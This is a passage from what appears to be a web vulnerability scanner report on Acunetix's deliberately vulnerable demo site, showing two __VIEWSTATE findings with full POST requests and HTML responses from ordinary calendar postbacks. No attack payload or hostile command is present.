href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8430&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDANO5UAtsIZGRkXIG%2Bv683r5j6w1YTGDgkM21MFa4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKg8OSaDALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBUkm0obUD9qnIK%2FM1pqAKFHruoC1
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:13 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDANO5UAtsIZGRkXIG+v683r5j6w1YTGDgkM21MFa4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKg8OSaDALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBUkm0obUD9qnIK/M1pqAKFHruoC1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:White" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8473&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAA%2BA0fJNsIZGRkRKxVAGIvZFeS3yZzvaIxsC1VXhI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKsxuLRDQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJdgaIUIDVZrZ3PaticrBL91PYZOo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:52 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAA+A0fJNsIZGRkRKxVAGIvZFeS3yZzvaIxsC1VXhI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsxuLRDQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJdgaIUIDVZrZ3PaticrBL91PYZOo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:White" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> 